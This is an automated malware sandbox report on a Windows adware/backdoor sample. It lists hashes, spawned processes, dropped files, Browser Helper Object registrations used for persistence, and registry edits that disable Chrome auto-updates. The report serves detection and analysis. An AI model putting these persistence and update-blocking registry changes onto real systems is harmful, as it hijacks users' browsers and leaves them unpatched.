Gen:Variant.Adware.Symmi.49922 (AdAware), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Backdoor, Adware
This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
Summary
MD5: 1cae3ce62857807fb52a3fa4bf6a6107
SHA1: e8ce1d3840b4169bedf695bf6a63a25655297063
SHA256: f7fb614d095924f9d4f4871303351178dc4d88bd0199dd0c1bfaadb0ecb3dc81
SSDeep: 24576:e0INoLhRU4UxuXI8q03ZY9z/WKL25xfCXfTx4U:e3yLj5XIOY9zO PTx
Size: 1356800 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: Cinema Plus2.7gV08.01
Created at: 2012-09-17 10:50:48
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Backdoor. Malware that enables remote control of the victim's machine.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
mscorsvw.exe:172
regsvr32.exe:388
regsvr32.exe:1776
rundll32.exe:1848
rundll32.exe:1324
%original file name%.exe:2008
%original file name%.exe:1664
%original file name%.exe:1252
%original file name%.exe:596
TyHelpTFUO.exe:1516
The Backdoor injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:2008 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3e88bb2a\temp.ca (10801 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@masterial[1].txt (219 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dll (3927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\CmPMt7BDxLvtoE[1].ca (5431 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dat (26 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.tlb (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2027aD4c704\images\loader.gif (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\cd5b15e575e1c3d03eba457016c7580f.ini (508 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.exe (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2027aD4c704\images\progressbar.gif (588 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3e88bb2a (0 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3e88bb2a\temp.ca (0 bytes)
The process %original file name%.exe:1664 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Program Files%\Follow\Follow.dat (6 bytes)
%Program Files%\Follow\Follow.exe (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\wKjUaVakO6heQO[1].ca (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00f6573f\temp.ca (1491 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f77a858\temp.ca (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\68f19A9f\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\68f19A9f\images\progressbar.gif (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[2] (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\cd5b15e575e1c3d03eba457016c7580f.ini (281 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\00f6573f\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f77a858\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00f6573f (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f77a858 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[1] (0 bytes)
The process %original file name%.exe:1252 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4bE3F8f474\images\progressbar.gif (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4bE3F8f474\images\loader.gif (2 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dll (3927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\28aa5195\temp.ca (10294 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bestories[1].txt (219 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\yNMtlpV56NSC6w[1].ca (5431 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dat (24 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.tlb (7 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\cd5b15e575e1c3d03eba457016c7580f.ini (518 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\28aa5195\temp.ca (0 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\28aa5195 (0 bytes)
The process %original file name%.exe:596 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\1[1].txt (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1.ini.task (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_4.ini.task (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\r1.flagmisterlibcontent[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\1_2_1[1].txt (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_3.ini.task (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1_4.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1_3.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\images\progressbar.gif (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_2_1.ini.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1.ini.tmp (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\%original file name%.exe (37624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\1_1[1].txt (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\1_1_3[1].txt (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\1_2[1].txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\bg.ca (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\1_1_4[1].txt (10 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_2_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[2] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_2.ini (0 bytes)
The process TyHelpTFUO.exe:1516 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Program Files%\Supporter\Supporter.dll (262021 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (28502 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (0 bytes)
Registry activity
The process mscorsvw.exe:172 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1260000"
The process regsvr32.exe:388 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 82 81 9D 95 3C BB AF 7E 3E C4 E6 DF DD 99 0A"
[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_\CurVer]
"(Default)" = "Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.9"
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\VersionIndependentProgID]
"(Default)" = "Pad7efdf6_aec2_4b6b_b677_0b880379eb76_"
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\InprocServer32]
"ThreadingModel" = "Apartment"
"(Default)" = "%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dll"
[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0\0\win32]
"(Default)" = "%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.tlb"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{ad7efdf6-aec2-4b6b-b677-0b880379eb76}" = "1"
[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.9]
"(Default)" = "YoUtuBeeAdBlockke"
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
"(Default)" = "YoUtuBeeAdBlockke"
[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.9\CLSID]
"(Default)" = "{ad7efdf6-aec2-4b6b-b677-0b880379eb76}"
[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_\CLSID]
"(Default)" = "{ad7efdf6-aec2-4b6b-b677-0b880379eb76}"
[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_]
"(Default)" = "YoUtuBeeAdBlockke"
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\ProgID]
"(Default)" = "Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.9"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
"(Default)" = "YoUtuBeeAdBlockke"
"NoExplorer" = "1"
The Backdoor deletes the following registry key(s):
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\ProgID]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\Programmable]
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\VersionIndependentProgID]
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\InprocServer32]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
The process regsvr32.exe:1776 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_]
"(Default)" = "PriceLeses"
[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.9]
"(Default)" = "PriceLeses"
[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0]
"(Default)" = "IEPluginLib"
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.9\CLSID]
"(Default)" = "{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}"
[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_\CLSID]
"(Default)" = "{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}"
[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
"(Default)" = "PriceLeses"
[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\VersionIndependentProgID]
"(Default)" = "Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_"
[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}\TypeLib]
"(Default)" = "{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}"
[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}]
"(Default)" = "IRegistry"
[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}\TypeLib]
"(Default)" = "{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}" = "1"
[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0\HELPDIR]
"(Default)" = "%Program Files%\PriceLeses"
[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\InprocServer32]
"(Default)" = "%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dll"
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\ProgID]
"(Default)" = "Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.9"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE E3 FF 45 93 DB FE BC 0D F2 05 18 15 7A C9 29"
[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}\TypeLib]
"(Default)" = "{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}"
[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0\0\win32]
"(Default)" = "%Program Files%\PriceLeses\NoXzg4pkazG9ZC.tlb"
[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}]
"(Default)" = "ILocalStorage"
[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}\TypeLib]
"Version" = "1.0"
[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_\CurVer]
"(Default)" = "Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.9"
[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}]
"(Default)" = "IPlaghinMein"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
"(Default)" = "PriceLeses"
"NoExplorer" = "1"
The Backdoor deletes the following registry key(s):
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\ProgID]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\Programmable]
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\InprocServer32]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\VersionIndependentProgID]
The process rundll32.exe:1848 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E EB F7 3C 05 22 3E 15 AE CC 81 7C 89 51 FC 3A"
The process rundll32.exe:1324 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"
"e46c271e" = "///%"
"c24899a6" = "Vx/g/CD/Mx////%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"48bd1aff" = "V/////%%"
"37b7a6d8" = "UlAr/XJ/c//k////"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"27ddcf6f" = "///%"
"a0743acc" = "N/////%%"
"0e93c3f3" = "///%"
"f2c53c49" = "UlAr/XJ/c//k////"
"51d2f2ea" = "JlA /Y//b/Ak/YZ/c//x/W//I//x/CD/Ux/e////"
"bbf88800" = "///%"
"a1dcff5b" = "V/////%%"
"8b9e4cbc" = "V/////%%"
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"3efeb33e" = ""
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0c230bcb" = "///%"
"7367429f" = "///%"
"f0bf0bde" = "///%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"370856c7" = ""
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c6c5dd44" = "V/////%%"
"6185d035" = "VP/h/CP/V//l////"
"414bc593" = "///%"
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"340d3099" = "/P////%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"iiid" = "1"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c5705860" = "Vx////%%"
"65114b36" = "Vl/l////"
"587b5709" = "V/////%%"
"1520c6f1" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 40 1D 03 0E E7 F9 2E BE 0E FB C2 96 A3 A8 F0"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"7f69fa1f" = "///%"
"c99a5f5c" = "///%"
"a2e3b941" = "///%"
"3c09c42b" = "///%"
"72758a5d" = "///%"
"2e22d94e" = "///%"
"d1abcdb6" = "///%"
"f6ad6fa6" = "V/////%%"
"2d71d5ab" = "V/////%%"
"f1f24e29" = "Vl/l/C/////%"
"fe94ce1e" = "V/////%%"
"0dc3ee96" = "/P////%%"
The process %original file name%.exe:2008 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"SilentUninstall" = "%Program Files%\PriceLeses\NoXzg4pkazG9ZC.exe /s /n /i:ExecuteCommands;UninstallCommands"
"DisplayIcon" = "%System%\msiexec.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 14 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"DisplayName" = "PriceLeses"
[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"UninstallString" = "%Program Files%\PriceLeses\NoXzg4pkazG9ZC.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"CategoryName" = "Apps"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"ProductName" = "PriceLeses"
"NoRepair" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"InfoURL" = "http://pricelessorsoft.com"
"NoModify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
